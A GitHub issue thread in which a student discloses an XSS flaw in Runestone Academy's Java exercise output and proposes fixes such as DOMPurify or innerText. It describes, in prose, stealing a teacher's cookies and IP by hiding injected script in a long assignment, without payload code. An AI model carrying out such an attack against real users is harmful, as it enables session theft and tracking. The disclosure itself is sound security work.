bhoffman0
commented
1 year ago Yes, you are right. We were aware of this, but no one got around to fixing it. I like your ideas for fixing this! Runestone is open source,. Do you want to try fixing it and do a pull request?
github-actions[bot]
My username on Runestone is "Endothermic-Dragon".
I was doing some java exercises for my AP CS A class (https://runestone.academy/ns/books/published/HHS-CSA-2022-2023-2/Unit6-Arrays/topic-6-1-array-basics.html), and I noticed that raw HTML was being displayed. This is a sign of possible XSS, so I tried injecting some javascript code (""), and it worked without any sort of filter or sanitation.
A possible exploitation of this is capture a user's cookies by sending it to an web endpoint. My teacher has informed me that they (1) can view and run all of her students' code and (2) check for code functionality and don't read through the code in detail before running. Using this information, I could theoretically launch an attack against them with a particularly long assignment, where I simply hide this vulnerable code somewhere in there. I could also grab her IP using a similar technique by checking the origin of the request and extrapolate her location. I would have further tested this theory, but have not obtained the consent of my teacher to do so.
If I had to fix this, I would either use DOMPurify to strip any JS or just use "element.innerText" to display the server response rather than "element.innerHTML". If execution is absolutely necessary, I would do this server-side in an appropriately isolated environment.